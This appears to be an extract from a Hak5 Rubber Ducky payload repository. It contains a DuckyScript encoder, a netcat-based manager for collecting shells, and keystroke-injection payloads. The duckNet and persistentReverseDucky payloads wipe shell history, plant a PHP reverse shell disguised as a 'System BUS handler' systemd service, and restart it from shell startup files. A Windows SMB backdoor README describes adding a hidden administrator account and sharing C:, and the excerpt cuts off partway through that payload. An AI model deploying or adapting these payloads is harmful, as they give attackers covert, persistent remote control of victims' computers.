93 ]\nASCII_5D = KEY_RIGHT_BRACE\t\t\t\n// 94 ^\nASCII_5E = KEY_6, MODIFIERKEY_SHIFT\t\t\t\t\n// 95 _\nASCII_5F = KEY_MINUS, MODIFIERKEY_SHIFT\t\t\t\t\t\n// 96 `\nASCII_60 = KEY_TILDE\t\t\n// 97 a\nASCII_61 = KEY_A\n// 98 b\nASCII_62 = KEY_B\t\t\t\t\t\n// 99 c\nASCII_63 = KEY_C\n// 100 d\nASCII_64 = KEY_D\t\t\t\t\t\n// 101 e\nASCII_65 = KEY_E\t\t\t\t\t\n// 102 f\nASCII_66 = KEY_F\t\t\t\t\t\n// 103 g\nASCII_67 = KEY_G\t\t\t\t\t\n// 104 h\nASCII_68 = KEY_H\t\t\t\t\t\n// 105 i\nASCII_69 = KEY_I\t\t\t\t\t\n// 106 j\nASCII_6A = KEY_J\t\t\t\t\t\n// 107 k\nASCII_6B = KEY_K\t\t\t\t\t\n// 108 l\nASCII_6C = KEY_L\t\t\t\t\t\n// 109 m\nASCII_6D = KEY_M\t\t\t\t\n// 110 n\nASCII_6E = KEY_N\t\t\t\t\t\n// 111 o\nASCII_6F = KEY_O\t\t\t\t\t\n// 112 p\nASCII_70 = KEY_P\t\t\t\t\t\n// 113 q\nASCII_71 = KEY_Q\t\t\t\t\t\n// 114 r\nASCII_72 = KEY_R\t\t\t\t\t\n// 115 s\nASCII_73 = KEY_S\t\t\t\t\t\n// 116 t\nASCII_74 = KEY_T\t\t\t\t\t\n// 117 u\nASCII_75 = KEY_U\t\t\t\t\t\n// 118 v\nASCII_76 = KEY_V\t\t\t\t\t\n// 119 w\nASCII_77 = KEY_W\t\t\t\t\t\n// 120 x\nASCII_78 = KEY_X\t\t\t\t\t\n// 121 y\nASCII_79 = KEY_Y\t\t\t\t\t\n// 122 z\nASCII_7A = KEY_Z\t\t\t\t\t\n// 123 {\nASCII_7B = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\t\t\t\t\n// 124 |\nASCII_7C = KEY_BACKSLASH, MODIFIERKEY_SHIFT\t\t\t\t\n// 125 }\nASCII_7D = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\t\t\t\n// 126 ~\nASCII_7E = KEY_TILDE, MODIFIERKEY_SHIFT\t\t\t\n// 127\nASCII_7F = KEY_BACKSPACE\t\t\t\t\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/src/Encoder.java", "content": "// File: Encoder.java\r\n// Created: 8/10/2011\r\n// Original Author:Jason Appelbaum Jason@Hak5.org \r\n// Author: Dnucna\r\n// Modified: 8/18/2012\r\n// Modified:\t 11/9/2013 midnitesnake \"added COMMAND-OPTION\"\r\n// Modified: 1/3/2013 midnitesnake \"added COMMAND\"\r\n// Modified: 1/3/2013 midnitesnake \"added REPEAT X\"\r\n// Modified:\t 2/5/2013 midnitesnake \"added ALT-SHIFT\"\r\n// Modified: 4/18/2013 midnitesnake \"added more user feedback\"\r\n// Modified:\t 5/2/2013 midnitesnake \"added skip over empty lines\"\r\n// Modified: 1/12/2014 Benthejunebug \"added ALT-TAB\"\r\n// Modified:\t 9/13/2016 rbeede \"added STRING_DELAY n text\"\r\n\r\nimport java.io.DataInputStream;\r\nimport java.io.File;\r\nimport java.io.FileInputStream;\r\nimport java.io.FileOutputStream;\r\nimport java.io.IOException;\r\nimport java.io.InputStream;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\n\r\nimport javax.swing.text.BadLocationException;\r\nimport javax.swing.text.Document;\r\nimport javax.swing.text.rtf.RTFEditorKit;\r\n\r\nimport java.util.Properties;\r\n\r\npublic class Encoder {\r\n /* contains the keyboard configuration */\r\n private static Properties keyboardProps = new Properties();\r\n /* contains the language layout */\r\n private static Properties layoutProps = new Properties();\r\n private static String version = \"2.6.4\";\r\n private static Boolean debug=false;\r\n \r\n public static void main(String[] args) {\r\n String helpStr = \"Hak5 Duck Encoder \"+version+\"\\n\\n\"\r\n + \"Usage: duckencode -i [file ..]\\t\\t\\tencode specified file\\n\"\r\n + \" or: duckencode -i [file ..] -o [file ..]\\tencode to specified file\\n\\n\"\r\n + \"Arguments:\\n\"\r\n + \" -i [file ..] \\t\\tInput File\\n\"\r\n + \" -o [file ..] \\t\\tOutput File\\n\"\r\n + \" -l [file ..] \\t\\tKeyboard Layout (us/fr/pt or a path to a properties file)\\n\\n\"\r\n + \"Script Commands:\\n\"\r\n + \" ALT [key name] (ex: ALT F4, ALT SPACE)\\n\"\r\n + \" CTRL | CONTROL [key name] (ex: CTRL ESC)\\n\"\r\n + \" CTRL-ALT [key name] (ex: CTRL-ALT DEL)\\n\"\r\n + \" CTRL-SHIFT [key name] (ex: CTRL-SHIFT ESC)\\n\"\r\n + \" DEFAULT_DELAY | DEFAULTDELAY [Time in millisecond] (change the delay between each command)\\n\"\r\n + \" DELAY [Time in millisecond] (used to overide temporary the default delay)\\n\"\r\n + \" GUI | WINDOWS [key name] (ex: GUI r, GUI l)\\n\"\r\n + \" REM [anything] (used to comment your code, no obligation :) )\\n\"\r\n + \" ALT-SHIFT (swap language)\\n\"\r\n + \" SHIFT [key name] (ex: SHIFT DEL)\\n\"\r\n + \" STRING [any character of your layout]\\n\"\r\n + \" STRING_DELAY [Number] [any character of your layout]\t(Number is ms delay between each character)\\n\"\r\n + \" REPEAT [Number] (Repeat last instruction N times)\\n\"\r\n + \" [key name] (anything in the keyboard.properties)\"; \r\n\r\n String inputFile = null;\r\n String outputFile = null;\r\n String layoutFile = null;\r\n\r\n if (args.length == 0) {\r\n System.out.println(helpStr);\r\n System.exit(0);\r\n }\r\n\r\n for (int i = 0; i < args.length; i++) {\r\n if (args[i].equals(\"--gui\") || args[i].equals(\"-g\")) {\r\n System.out.println(\"Launch GUI\");\r\n } else if (args[i].equals(\"--help\") || args[i].equals(\"-h\")) {\r\n System.out.println(helpStr);\r\n } else if (args[i].equals(\"-i\")) {\r\n // encode file\r\n inputFile = args[++i];\r\n } else if (args[i].equals(\"-o\")) {\r\n // output file\r\n outputFile = args[++i];\r\n } else if (args[i].equals(\"-l\")) {\r\n // output file\r\n layoutFile = args[++i];\r\n } else if (args[i].equals(\"-d\")) {\r\n // output file\r\n debug=true;\r\n } else {\r\n System.out.println(helpStr);\r\n break;\r\n }\r\n }\r\n \r\n System.out.println(\"Hak5 Duck Encoder \"+version+\"\\n\");\r\n \r\n if (inputFile != null) {\r\n String scriptStr = null;\r\n\r\n if (inputFile.contains(\".rtf\")) {\r\n try {\r\n FileInputStream stream = new FileInputStream(inputFile);\r\n RTFEditorKit kit = new RTFEditorKit();\r\n Document doc = kit.createDefaultDocument();\r\n kit.read(stream, doc, 0);\r\n\r\n scriptStr = doc.getText(0, doc.getLength());\r\n System.out.println(\"Loading RTF .....\\t\\t[ OK ]\");\r\n } catch (IOException e) {\r\n System.out.println(\"Error with input file!\");\r\n } catch (BadLocationException e) {\r\n System.out.println(\"Error with input file!\");\r\n }\r\n \r\n } else {\r\n DataInputStream in = null;\r\n try {\r\n File f = new File(inputFile);\r\n byte[] buffer = new byte[(int) f.length()];\r\n in = new DataInputStream(new FileInputStream(f));\r\n in.readFully(buffer);\r\n scriptStr = new String(buffer);\r\n System.out.println(\"Loading File .....\\t\\t[ OK ]\");\r\n } catch (IOException e) {\r\n System.out.println(\"Error with input file!\");\r\n } finally {\r\n try {\r\n in.close();\r\n } catch (IOException e) { /* ignore it */\r\n }\r\n }\r\n }\r\n loadProperties((layoutFile == null) ? \"us\" : layoutFile);\r\n \r\n encodeToFile(scriptStr, (outputFile == null) ? \"inject.bin\"\r\n : outputFile);\r\n }\r\n \r\n }\r\n \r\n private static void loadProperties (String lang){\r\n InputStream in;\r\n ClassLoader loader = ClassLoader.getSystemClassLoader ();\r\n try {\r\n in = loader.getResourceAsStream(\"keyboard.properties\");\r\n if(in != null){\r\n keyboardProps.load(in);\r\n in.close();\r\n System.out.println(\"Loading Keyboard File .....\\t[ OK ]\");\r\n }else{\r\n System.out.println(\"Error with keyboard.properties!\");\r\n System.exit(0);\r\n }\r\n } catch (IOException e) {\r\n System.out.println(\"Error with keyboard.properties!\");\r\n }\r\n \r\n try {\r\n in = loader.getResourceAsStream(lang + \".properties\");\r\n if(in != null){\r\n layoutProps.load(in);\r\n in.close();\r\n System.out.println(\"Loading Language File .....\\t[ OK ]\");\r\n }else{\r\n if(new File(lang).isFile()){\r\n layoutProps.load(new FileInputStream(lang));\r\n System.out.println(\"Loading Language File .....\\t[ OK ]\");\r\n } else{\r\n System.out.println(\"External layout.properties non found!\");\r\n System.exit(0);\r\n }\r\n }\r\n } catch (IOException e) {\r\n System.out.println(\"Error with layout.properties!\");\r\n System.exit(0);\r\n }\r\n\r\n }\r\n private static void encodeToFile(String inStr, String fileDest) {\r\n\r\n inStr = inStr.replaceAll(\"\\\\r\", \"\"); // CRLF Fix\r\n String[] instructions = inStr.split(\"\\n\");\r\n String[] last_instruction = inStr.split(\"\\n\");\r\n List file = new ArrayList();\r\n int defaultDelay = 0;\r\n int loop =0;\r\n boolean repeat=false;\r\n System.out.println(\"Loading DuckyScript .....\\t[ OK ]\");\r\n if(debug) System.out.println(\"\\nParsing Commands:\");\r\n for (int i = 0; i < instructions.length; i++) {\r\n try {\r\n boolean delayOverride = false;\r\n String commentCheck = instructions[i].substring(0, 2);\r\n if (commentCheck.equals(\"//\"))\r\n continue;\r\n\t\t\t\tif (instructions[i].equals(\"\\n\"))\r\n\t\t\t\t\tcontinue;\r\n String[] instruction = instructions[i].split(\" \", 2);\r\n \r\n if(i>0){\r\n \t\tlast_instruction=instructions[i-1].split(\" \", 2);\r\n \t\tlast_instruction[0].trim();\r\n \t\tif (last_instruction.length == 2) {\r\n \t\tlast_instruction[1].trim();\r\n \t\t}\r\n }else{\r\n \t\tlast_instruction=instructions[i].split(\" \", 2);\r\n \t\tlast_instruction[0].trim();\r\n \t\tif (last_instruction.length == 2) {\r\n \t\tlast_instruction[1].trim();\r\n \t\t}\r\n }\r\n\r\n instruction[0].trim();\r\n\r\n if (instruction.length == 2) {\r\n instruction[1].trim();\r\n }\r\n\r\n\t\t\t\t\t\t\t\tif (instruction[0].equals(\"REM\")){\r\n\t\t\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\tif (instruction[0].equals(\"REPEAT\")){\r\n\t\t\t\t\t\t\t\t\tloop=Integer.parseInt(instruction[1].trim());\r\n\t\t\t\t\t\t\t\t\trepeat=true;\r\n\t\t\t\t\t\t\t\t}else{\r\n\t\t\t\t\t\t\t\t\trepeat=false;\r\n\t\t\t\t\t\t\t\t\tloop=1;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\twhile(loop>0){\r\n\t\t\t\t\t\t\t\t\tif (repeat){\r\n\t\t\t\t\t\t\t\t\t\tinstruction=last_instruction;\r\n\t\t\t\t\t\t\t\t\t\t//System.out.println(Integer.toString(instruction.length));\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\tif (debug) System.out.println(java.util.Arrays.toString(instruction));\r\n \tif (instruction[0].equals(\"DEFAULT_DELAY\")\r\n || instruction[0].equals(\"DEFAULTDELAY\")) {\r\n \t defaultDelay = Integer.parseInt(instruction[1].trim());\r\n \t delayOverride = true;\r\n \t} else if (instruction[0].equals(\"DELAY\")) {\r\n int delay = Integer.parseInt(instruction[1].trim());\r\n while (delay > 0) {\r\n file.add((byte) 0x00);\r\n if (delay > 255) {\r\n file.add((byte) 0xFF);\r\n delay = delay - 255;\r\n } else {\r\n file.add((byte) delay);\r\n delay = 0;\r\n }\r\n }\r\n delayOverride = true;\r\n \t} else if (instruction[0].equals(\"STRING\")) {\r\n for (int j = 0; j < instruction[1].length(); j++) {\r\n char c = instruction[1].charAt(j);\r\n addBytes(file,charToBytes(c));\r\n }\r\n \t} else if (instruction[0].equals(\"STRING_DELAY\")) {\r\n \t\tfinal String[] twoOptions = instruction[1].split(\" \", 2);\r\n \t\tfinal int delayMillis = Integer.parseInt(twoOptions[0].trim());\r\n \t\tfinal String userText = twoOptions[1].trim();\r\n \t\t\r\n \t\tif(debug) System.out.println(delayMillis);\r\n \t\tif(debug) System.out.println(userText);\r\n \t\t\r\n for (int j = 0; j < userText.length(); j++) {\r\n char c = userText.charAt(j);\r\n addBytes(file,charToBytes(c));\r\n \r\n // Now insert the delay before the next character (and after the last is provided)\r\n for(int counter = delayMillis; counter > 0; counter -= 0xFF) {\r\n \tfile.add((byte) 0x00);\r\n \tif(counter > 0xFF) {\r\n \t\tfile.add((byte) 0xFF);\r\n \t} else {\r\n \t\tfile.add((byte) counter); // Last one\r\n \t}\r\n }\r\n }\r\n \t} else if (instruction[0].equals(\"CONTROL\")\r\n || instruction[0].equals(\"CTRL\")) {\r\n if (instruction.length != 1){\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add(strToByte(keyboardProps.getProperty(\"MODIFIERKEY_CTRL\")));\r\n } else {\r\n file.add(strToByte(keyboardProps.getProperty(\"KEY_LEFT_CTRL\")));\r\n file.add((byte) 0x00);\r\n } \r\n \t} else if (instruction[0].equals(\"ALT\")) {\r\n if (instruction.length != 1){\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add(strToByte(keyboardProps.getProperty(\"MODIFIERKEY_ALT\")));\r\n } else {\r\n file.add(strToByte(keyboardProps.getProperty(\"KEY_LEFT_ALT\")));\r\n file.add((byte) 0x00);\r\n }\r\n \t} else if (instruction[0].equals(\"SHIFT\")) {\r\n if (instruction.length != 1) {\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add(strToByte(keyboardProps.getProperty(\"MODIFIERKEY_SHIFT\")));\r\n } else {\r\n file.add(strToByte(keyboardProps.getProperty(\"KEY_LEFT_SHIFT\")));\r\n file.add((byte) 0x00);\r\n }\r\n \t} else if (instruction[0].equals(\"CTRL-ALT\")) {\r\n if (instruction.length != 1) {\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add((byte) (strToByte(keyboardProps.getProperty(\"MODIFIERKEY_CTRL\"))\r\n | strToByte(keyboardProps.getProperty(\"MODIFIERKEY_ALT\"))));\r\n } else {\r\n continue;\r\n }\r\n \t} else if (instruction[0].equals(\"CTRL-SHIFT\")) {\r\n if (instruction.length != 1) {\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add((byte) (strToByte(keyboardProps.getProperty(\"MODIFIERKEY_CTRL\"))\r\n | strToByte(keyboardProps.getProperty(\"MODIFIERKEY_SHIFT\"))));\r\n } else {\r\n continue;\r\n }\r\n } else if (instruction[0].equals(\"COMMAND-OPTION\")) {\r\n if (instruction.length != 1) {\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add((byte) (strToByte(keyboardProps.getProperty(\"MODIFIERKEY_KEY_LEFT_GUI\"))\r\n | strToByte(keyboardProps.getProperty(\"MODIFIERKEY_ALT\"))));\r\n } else {\r\n continue;\r\n }\r\n \t} else if (instruction[0].equals(\"ALT-SHIFT\")) {\r\n if (instruction.length != 1) {\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add((byte) (strToByte(keyboardProps.getProperty(\"MODIFIERKEY_LEFT_ALT\"))\r\n | strToByte(keyboardProps.getProperty(\"MODIFIERKEY_SHIFT\")))\r\n );\r\n } else {\r\n file.add(strToByte(keyboardProps.getProperty(\"KEY_LEFT_ALT\")));\r\n file.add((byte) (strToByte(keyboardProps.getProperty(\"MODIFIERKEY_LEFT_ALT\"))\r\n | strToByte(keyboardProps.getProperty(\"MODIFIERKEY_SHIFT\")))\r\n );\r\n }\r\n \t} else if (instruction[0].equals(\"ALT-TAB\")){\r\n if (instruction.length == 1) {\r\n file.add(strToByte(keyboardProps.getProperty(\"KEY_TAB\")));\r\n file.add(strToByte(keyboardProps.getProperty(\"MODIFIERKEY_LEFT_ALT\")));\r\n } else{\r\n // do something?\r\n }\r\n } else if (instruction[0].equals(\"REM\")) {\r\n /* no default delay for the comments */\r\n delayOverride = true;\r\n continue;\r\n \t} else if (instruction[0].equals(\"WINDOWS\")\r\n || instruction[0].equals(\"GUI\")) {\r\n if (instruction.length == 1) {\r\n file.add(strToByte(keyboardProps.getProperty(\"MODIFIERKEY_LEFT_GUI\")));\r\n file.add((byte) 0x00);\r\n } else {\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add(strToByte(keyboardProps.getProperty(\"MODIFIERKEY_LEFT_GUI\")));\r\n }\r\n \t} else if (instruction[0].equals(\"COMMAND\")){\r\n if (instruction.length == 1) {\r\n file.add(strToByte(keyboardProps.getProperty(\"KEY_COMMAND\")));\r\n file.add((byte) 0x00);\r\n } else {\r\n file.add(strInstrToByte(instruction[1]));\r\n file.add(strToByte(keyboardProps.getProperty(\"MODIFIERKEY_LEFT_GUI\")));\r\n }\r\n \t}else {\r\n /* treat anything else as a key */\r\n file.add(strInstrToByte(instruction[0]));\r\n file.add((byte) 0x00);\r\n \t}\r\n \tloop--;\r\n\t\t\t\t\t\t\t\t}\r\n // Default delay\r\n if (!delayOverride & defaultDelay > 0) {\r\n int delayCounter = defaultDelay;\r\n while (delayCounter > 0) {\r\n file.add((byte) 0x00);\r\n if (delayCounter > 255) {\r\n file.add((byte) 0xFF);\r\n delayCounter = delayCounter - 255;\r\n } else {\r\n file.add((byte) delayCounter);\r\n delayCounter = 0;\r\n }\r\n }\r\n }\r\n }catch (StringIndexOutOfBoundsException e){\r\n\t\t\t\t//do nothing\r\n }\r\n catch (Exception e) {\r\n System.out.println(\"Error on Line: \" + (i + 1));\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n // Write byte array to file\r\n byte[] data = new byte[file.size()];\r\n for (int i = 0; i < file.size(); i++) {\r\n data[i] = file.get(i);\r\n }\r\n try {\r\n File someFile = new File(fileDest);\r\n FileOutputStream fos = new FileOutputStream(someFile);\r\n fos.write(data);\r\n fos.flush();\r\n fos.close();\r\n System.out.println(\"DuckyScript Complete.....\\t[ OK ]\\n\");\r\n } catch (Exception e) {\r\n System.out.print(\"Failed to write hex file!\");\r\n }\r\n \r\n }\r\n\r\n private static void addBytes(List file, byte[] byteTab){\r\n for(int i=0;i= $min )); then\n \t\tsed -i -e \"s/0.0.0.0/$ip/g\" $dir/payload\n\t\tsed -i -e \"s/4444/$port/g\" $dir/payload\n\t\techo -e \"$(echo \"$name\"|xargs)\\t$ip\\t$port\" >> ~/.config/duckNet/duckNet.db\n\t\tread -p \"Do you want payload encoded(y|n): \" enc\n\t\tif [ \"$enc\" = y ]\n\t\tthen\n\t\t\tjava -jar ~/.config/duckNet/Encoder/encoder.jar -i $dir/payload -o $dir/inject.bin\n\t\t\trm $dir/payload\n\t\t\techo -e \"\\033[0;32m\\e[1mduckNetManager:Success:\\e[0mCreated new Target \\\"$name\\\" with IP address \\\"$ip\\\" and Port number \\\"$port\\\".\"\n\t\t\texit 1\n\t\tfi\n\telse \n \t\techo -e \"\\033[0;31m\\e[1mduckNetManager:Error:\\e[0mInvalid IP address \\\"$ip\\\" or Port number \\\"$port\\\".\"\n\t\texit 1\n\tfi\n\n}\nlist () {\n\t\n\tcolumn -t -o ' ' ~/.config/duckNet/duckNet.db | awk '{print NR\" - \"$0}'\t\n}\nremove () {\n\techo\n\tlist\n\techo\n\tread -p \"Enter name of target to remove: \" rmv\n\tif grep -q $rmv ~/.config/duckNet/duckNet.db; then\n \t\tsed -i \"/\\b\\($rmv\\)\\b/d\" ~/.config/duckNet/duckNet.db\n\t\techo -e \"\\033[0;32m\\e[1mduckNetManager:Success:\\e[0mRemoved \\\"$rmv\\\".\"\n\telse\n \t\techo -e \"\\033[0;31m\\e[1mduckNetManager:Error:\\e[0m\\\"$rmv\\\" no such target found.\"\n\tfi\n}\nupdate () {\n\techo\n\tlist\n\techo\n\tread -p \"Choose target number: \" cho\n\tread -p \"You want to update (ip|port): \" ent\n\tif [ \"$ent\" = ip ]\n\tthen\n\t\tone=$(sed \"\"$cho\\!d\"\" ~/.config/duckNet/duckNet.db | grep -E -o \"([0-9]{1,3}[\\.]){3}[0-9]{1,3}\")\n\t\tread -p \"Enter new ip: \" use\n\t\tif [[ $use =~ ^[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+$ ]]; then\n\t\t\tsed -i -e \"$cho s/$one/$use/g\" ~/.config/duckNet/duckNet.db\n\t\t\techo -e \"\\033[0;32m\\e[1mduckNetManager:Success:\\e[0mUpdated IP.\"\n\t\telse\n\t\t\techo -e \"\\033[0;31m\\e[1mduckNetManager:Error:\\e[0mInvalid IP address \\\"$use\\\".\"\n\t\t\texit\n\t\tfi\n\telif [ \"$ent\" = port ]\n\tthen\n\t\ttwo=$(sed \"\"$cho\\!d\"\" ~/.config/duckNet/duckNet.db | awk '{print $ 3}')\n\t\tread -p \"Enter new Port number: \" useP\n\t\tmax=65535\n\t\tmin=1500\n\t\tif (( $useP <= $max )) && (( $useP >= $min )); then\n\t\t\tsed -i -e \"$cho s/$two/$useP/g\" ~/.config/duckNet/duckNet.db\n\t\t\techo -e \"\\033[0;32m\\e[1mduckNetManager:Success:\\e[0mUpdated Port number\\\"$ent\\\".\"\n\t\telse\n\t\t\techo -e \"\\033[0;31m\\e[1mduckNet:Error:\\e[0mInvalid Port Number \\\"$useP\\\".\"\n\t\tfi\n\telse\n\t\techo -e \"\\033[0;31m\\e[1mduckNetManager:Error:\\e0m[Invalid choice \\\"$ent\\\".\"\n\tfi\n}\nconnect () {\n\techo\n\tlist\n\techo\n\tread -p \"Enter Target number to connect: \" cho\n\tone=$(sed \"\"$cho\\!d\"\" ~/.config/duckNet/duckNet.db | grep -E -o \"([0-9]{1,3}[\\.]){3}[0-9]{1,3}\")\n\ttwo=$(sed \"\"$cho\\!d\"\" ~/.config/duckNet/duckNet.db | awk '{print $ 3}')\n\tread -p \"Do you want to listen on local address(y|n): \" src\n\tif [ \"$src\" = n ]\n\tthen\n\t\techo -e \"Listning on IP address \\\"$one\\\" and Port number \\\"$two\\\"....\"\n\t\tnc -lv -s $one -p $two\n\telif [ \"$src\" = y ]\n\tthen\n\t\techo -e \"Listning on Port number \\\"$two\\\"....\"\n\t\tnc -nvlp $two\n\telse\n\t\techo -e \"\\033[0;31m\\e[1mduckNetManager:Error:\\e[0mInvalid choice \\\"$src\\\".\"\n\tfi\n}\nif [ \"$ch\" = 1 ]\n then\n connect\nelif [ \"$ch\" = 2 ]\n then\n create\nelif [ \"$ch\" = 3 ]\n then\n list\nelif [ \"$ch\" = 4 ]\n then\n remove\nelif [ \"$ch\" = 5 ]\n then\n update\nelse\n\techo -e \"\\033[0;31m\\e[1mduckNet:Error:\\e[0mInvalid choice \\\"$ch\\\".\"\nfi \n" }, { "path": "payloads/library/remote_access/duckNet/install.sh", "content": "mkdir ~/.config/duckNet\nmv payload ~/.config/duckNet/\ntouch ~/.config/duckNet/duckNet.db \nchmod +x duckNetManager\nsudo mv duckNetManager /bin/\nmv Encoder ~/.config/duckNet/\n" }, { "path": "payloads/library/remote_access/duckNet/payload", "content": "REM Title: duckNet\nREM Description: Create, Encode, Inject, Spread your duckNet and manage it using duckNetManager.\nREM AUTHOR: drapl0n\nREM Version: 1.0\nREM Category: Remote Access\nREM Target: Unix-like operating systems with systemd.\nREM Attackmodes: HID\n\nREM [keeping tracks clear]\nDELAY 500\nCTRL-ALT t\nDELAY 400\nSTRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE\nENTER\nDELAY 100\n\nREM [creating reverse shell]\nSTRING mkdir /var/tmp/.system\nENTER\nDELAY 100\nSTRING echo -e \"while :\\ndo\\n\\tping -c 5 0.0.0.0\\n\\tif [ $? -eq 0 ]; then\\n\\t\\tphp -r '\\$sock=fsockopen(\\\"0.0.0.0\\\",4444);exec(\"\\\"/bin/sh -i \"<&3 >&3 2>&3\"\\\"\");'\\n\\tfi\\ndone\" > /var/tmp/.system/systemBus\nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/systemBus\nENTER\nDELAY 100\n\nREM [creating non-root systemd service]\nSTRING mkdir -p ~/.config/systemd/user\nENTER\nDELAY 100\nSTRING echo -e \"[Unit]\\nDescription= System BUS handler\\n\\n[Service]\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\nRestart=on-failure\\nSuccessExitStatus=3 4\\nRestartForceExitStatus=3 4\\n\\n[Install]\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nENTER\nDELAY 100\n\nREM [enabling service]\nSTRING systemctl --user daemon-reload\nENTER\nSTRING systemctl --user enable --now systemBUS.service\nENTER\nSTRING systemctl --user start --now systemBUS.service\nENTER\nDELAY 100\n\nREM [autostarting service on terminal/shell launch]\nSTRING echo -e \"ls -a | grep 'zshrc' &> /dev/null\\nif [ $? = 0 ]; then\\n\\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\\nfi\\n\\nls -a | grep 'bashrc' &> /dev/null\\nif [ $? = 0 ]; then\\n\\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\\nfi\\n\\n\" > ~/tmmmp\nENTER\nDELAY 50\nSTRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit\nENTER\n" }, { "path": "payloads/library/remote_access/persistentReverseDucky/README.md", "content": "## About:\n* Title: persistentReverseDucky\n* Description: persistentReverseDucky provides you persistent reverse shell remotely/locally..\n* AUTHOR: drapl0n\n* Version: 1.0\n* Category: Remote Access\n* Target: Unix-like operating systems with systemd.\n* Attackmodes: HID\n\n## persistentReverseDucky: provides you persistent reverse shell remotely/locally by creating non-root systemd service within 10 secs.\n\n* Note change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number.\n* Only for educational purpose.\n### Workflow:\nKeeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell. \n### Algorithm:\n1. Stop storing history, this helps to keep tracks clear from begining.\n2. Creating reverse shell.\n3. Creating non-root systemd service.\n4. Enabling service.\n5. Starting service on trigger of firing terminal emulator/shell.\n\n#### Support me if you like my work:\n* https://twitter.com/drapl0n\n" }, { "path": "payloads/library/remote_access/persistentReverseDucky/payload.txt", "content": "REM Title: persistentReverseDucky\nREM Description: persistentReverseDucky provides you persistent reverse shell remotely/locally by creating non-root systemd service.\nREM AUTHOR: drapl0n\nREM Version: 1.0\nREM Category: Remote Access\nREM Target: Unix-like operating systems with systemd\nREM Attackmodes: HID\n\nREM [keeping tracks clear]\nDELAY 500\nCTRL-ALT t\nDELAY 400\nSTRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE\nENTER\nDELAY 100\n\nREM [creating reverse shell]\nSTRING mkdir /var/tmp/.system\nENTER\nDELAY 100\nSTRING echo -e \"while :\\ndo\\n\\tping -c 5 0.0.0.0\\n\\tif [ $? -eq 0 ]; then\\n\\t\\tphp -r '\\$sock=fsockopen(\\\"0.0.0.0\\\",4444);exec(\"\\\"/bin/sh -i \"<&3 >&3 2>&3\"\\\"\");'\\n\\tfi\\ndone\" > /var/tmp/.system/systemBus\nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/systemBus\nENTER\nDELAY 100\n\nREM [creating non-root systemd service]\nSTRING mkdir -p ~/.config/systemd/user\nENTER\nDELAY 100\nSTRING echo -e \"[Unit]\\nDescription= System BUS handler\\n\\n[Service]\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\nRestart=on-failure\\nSuccessExitStatus=3 4\\nRestartForceExitStatus=3 4\\n\\n[Install]\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nENTER\nDELAY 100\n\nREM [enabling service]\nSTRING systemctl --user daemon-reload\nENTER\nSTRING systemctl --user enable --now systemBUS.service\nENTER\nSTRING systemctl --user start --now systemBUS.service\nENTER\nDELAY 100\n\nREM [autostarting service on terminal/shell launch]\nSTRING echo -e \"ls -a | grep 'zshrc' &> /dev/null\\nif [ $? = 0 ]; then\\n\\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\\nfi\\n\\nls -a | grep 'bashrc' &> /dev/null\\nif [ $? = 0 ]; then\\n\\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\\nfi\\n\\n\" > ~/tmmmp\nENTER\nDELAY 50\nSTRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit\nENTER\n" }, { "path": "payloads/library/remote_access/win_smb-backdoor/README.md", "content": "# \"Microsoft Windows\" SMB Backdoor\n\n- Title: \"Microsoft Windows\" SMB Backdoor\n- Author: TW-D\n- Version: 1.0\n- Target: Microsoft Windows\n- Category: Remote Access\n\n## Description\n\n1) Adds a user account (RD_User:RD_P@ssW0rD).\n2) Adds this local user to local administrator group.\n3) Shares \"C:\" directory (RD_SHARE).\n4) Adds a rule to the firewall.\n5) Sets a value to \"LocalAccountTokenFilterPolicy\" to access the \"C:\" with a local account.\n6) Hides this user account.\n\n## Exploitation\n\n>\n> The connection identifiers will be those defined by the values : **RD_User** and **RD_P@ssW0rD**.\n>\n\n```\nhacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./RD_User:RD_P@ssW0rD@\nC:\\WINDOWS\\system32> whoami\nnt authority\\system\n```\n\n>\n> The connection identifiers and the share name will be those defined by the values : **RD_SHARE**, **RD_User** and **RD_P@ssW0rD**.\n>\n\n```\nsmb:///RD_SHARE/\n```" }, { "path": "payloads/library/remote_access/win_smb-backdoor/payload.txt", "content": "REM #\nREM # Title: \"Microsoft Windows\" SMB Backdoor\nREM #\nREM # Description: \nREM # 1) Adds a user account (RD_User:RD_P@ssW0rD).\nREM # 2) Adds this local user to local administrator group.\nREM # 3) Shares \"C:\" directory 